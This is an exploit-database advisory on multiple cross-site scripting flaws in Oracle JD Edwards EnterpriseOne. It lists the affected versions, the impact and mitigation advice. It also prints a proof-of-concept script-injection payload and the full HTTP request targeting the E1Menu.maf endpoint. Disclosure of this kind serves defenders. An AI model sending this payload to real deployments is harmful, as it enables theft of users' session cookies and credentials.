Oracle JD Edwards EnterpriseOne Multiple Cross-Site Scripting Vulnerabilities

vendor:

JD Edwards EnterpriseOne

by:

5.5

CVSS

MEDIUM

Cross-Site Scripting (XSS)

CWE

Product Name: JD Edwards EnterpriseOne

Affected Version From: 8.9 GA

Affected Version To: 8.98.4.1 and OneWorld Tools through 24.1.3

Patch Exists: NO

Related CWE:

CPE: oracle:jde_edwards_enterpriseone

Metasploit:

Other Scripts:

Platforms Tested:

Oracle JD Edwards EnterpriseOne Multiple Cross-Site Scripting Vulnerabilities

An attacker can execute arbitrary script code in the browser of a user in the context of the affected site, potentially stealing authentication credentials and launching other attacks.

Mitigation:

Apply vendor patches or updates to address the XSS vulnerabilities. Filter user-supplied input to remove or encode potentially malicious characters.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47479/info

Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

This vulnerability affects the following supported versions:
8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 

http://XXX.XXX.XXX.XXX/jde/E1Menu.maf

Parameter: jdeowpBackButtonProtect



* The GET request has been set to: >'"><script>alert(20639)</script>

/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED&%3E%27%22%3E%3Cscript%3Ealert%2820639%29%3C%2Fscript%3E=123 HTTP/1.0

Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=00002ZzkuqI4ibppzAAcyOOuBnh:14p7umbnp; e1MenuState=100003759|

Accept: */*

Accept-Language: en-US

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)

Host: XXX.XXX.XXX.XXX